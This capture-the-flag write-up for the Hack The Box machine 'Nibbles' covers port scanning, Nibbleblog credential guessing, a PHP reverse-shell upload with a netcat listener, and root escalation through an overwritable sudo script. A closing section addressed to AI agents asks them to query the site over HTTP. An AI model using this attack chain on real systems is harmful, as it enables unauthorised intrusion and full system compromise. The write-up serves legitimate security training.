# Nibbles
## Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.75 -oN allPorts
* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.
```
# Nmap 7.92 scan initiated Thu Mar 10 12:19:23 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.75
Warning: 10.10.10.75 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.75
Host is up (0.058s latency).
Not shown: 64924 closed tcp ports (reset), 609 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Thu Mar 10 12:19:41 2022 -- 1 IP address (1 host up) scanned in 18.48 seconds
```
As we see, only port 22 (*SSH*) and port 80 (*HTTP*) are open. Let's try to obtain more information about the service and version running on these ports.
> nmap -sC -sV -p22,80 10.10.10.68 -oN targeted
* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file
```
# Nmap 7.92 scan initiated Thu Mar 10 12:20:32 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 10 12:20:43 2022 -- 1 IP address (1 host up) scanned in 11.11 seconds
```
Let's take a look at the website.
There's not much going on. But, if we take a look at the source code, we'll see that we can access the `/nibbleblog/` directory.
```html
Hello world!
```
If we take a look at the `/nibbleblog/` directory, we'll see in the bottom right corner that it is using `Nibbleblog`.
Let's try to enumerate directories and `.php` files with *gobuster*.
> gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x php
* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.
* `-x` file **extensions** to search for.
```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/03/10 15:17:14 Starting gobuster in directory enumeration mode
===============================================================
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/sitemap.php (Status: 200) [Size: 402]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php (Status: 200) [Size: 302]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php (Status: 200) [Size: 78]
/README (Status: 200) [Size: 4628]
/update.php (Status: 200) [Size: 1622]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/index.php (Status: 200) [Size: 2986]
===============================================================
2022/03/10 15:20:32 Finished
===============================================================
```
## Exploitation
Let's search for common `Nibbleblog` exploits.
> searchsploit nibbleblog
```
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
If we inspect the `Arbitrary File Upload` one, we can see that it is logging in to the `admin.php` page.
```perl
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass
}
)
```
But we don't have any credentials. I found the `admin` user on the `http://10.10.10.75/nibbleblog/content/private/users.xml` inside the `/content` directory we found in the *gobuster* scan.
At this point I tried random credentials on the `admin.php` page, and I got in with the `admin` user and the `nibbles` password.
And we get in.
Once we have logged in, the script uploads a file to a plugin called `My image`.
```perl
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin.php'),
'vars_get' => {
'controller' => 'plugins',
'action' => 'config',
'plugin' => 'my_image'
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
```
If we go the the `Plugins` section, we'll see an installed plugin called `My image`.
If we hit `Configure`, we'll see that we can upload a file. I will upload the `/usr/share/webshells/php/php-reverse-shell.php` *PHP* reverse shell. But before uploading it, we have to modified it by changing the `$ip` variable and the `$port` variable.
```php
$ip = '10.10.14.6'; // CHANGE THIS
$port = 4444; // CHANGE THIS
```
Now, we can upload the *PHP* file to the `My image` plugin.
Finally, we can see in the `Arbitrary File Upload` exploit that the *PHP* file is stored in the `/content/private/plugins/my_image` folder under the `image.php` name.
```perl
php_fname = 'image.php'
payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
```
But before executing it, let's set a `netcat` listener on port `4444`.
> nc -lvnp 4444
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
If now we access the `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php` file, we'll get a reverse shell as the `nibbler` user, and we'll be able to get the user flag.
```
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.75] 57220
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
09:42:57 up 2:59, 0 users, load average: 0.00, 0.03, 0.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
$ cat /home/nibbler/user.txt
c587819fe41103ce29a36823dc7cd9d6
```
## Privilege Escalation
First of all, let's set an interactive *TTY* shell.
> script /dev/null -c /bin/bash
Then I press `Ctrl+Z` and execute the following command on my local machine:
> stty raw -echo; fg
Next, I export a few variables:
> export TERM=xterm
>
> export SHELL=bash
Finally, I run the following command in our local machine:
> stty size
```
51 236
```
And set the proper dimensions in the victim machine:
> stty rows 51 columns 236
Let's list the *sudo* privileges of the `nibbler` user.
> sudo -l
* `-l` list user **privileges**.
```
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
We can execute the `/home/nibbler/personal/stuff/monitor.sh` script as the `root` user. But if we try to list the script, we'll see that it doesn't exist.
> ls -l /home/nibbler/personal/stuff/monitor.sh
```
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory
```
But, if we see in the home directory of the `nibbler` user, we'll see that there is an `.zip` file.
> ls -la /home/nibbler/
```
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Mar 10 09:50 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Mar 10 06:43 user.txt
```
Let's *unzip* it.
> unzip personal.zip
```
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
```
Inside was the `monitor.sh` script that we have *sudo* permissions on.
> ls -l /home/nibbler/personal/stuff/monitor.sh
```
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 /home/nibbler/personal/stuff/monitor.sh
```
As we have the right permission to write on it, we could remove everything inside, and add a *bash* script which will spawn a shell as `root`, when we'll execute it with *sudo* privileges.
> nano /home/nibbler/personal/stuff/monitor.sh
```bash
#!/bin/bash
bash
```
Now all we have to do is execute the script with *sudo*, and we'll be able to reap the harvest and take the root flag.
> sudo /home/nibbler/personal/stuff/monitor.sh
```
root@Nibbles:/home/nibbler# whoami
root
root@Nibbles:/home/nibbler# cat /root/root.txt
79e4a7369f8e0752572e05c7bfc96df5
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/nibbles.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.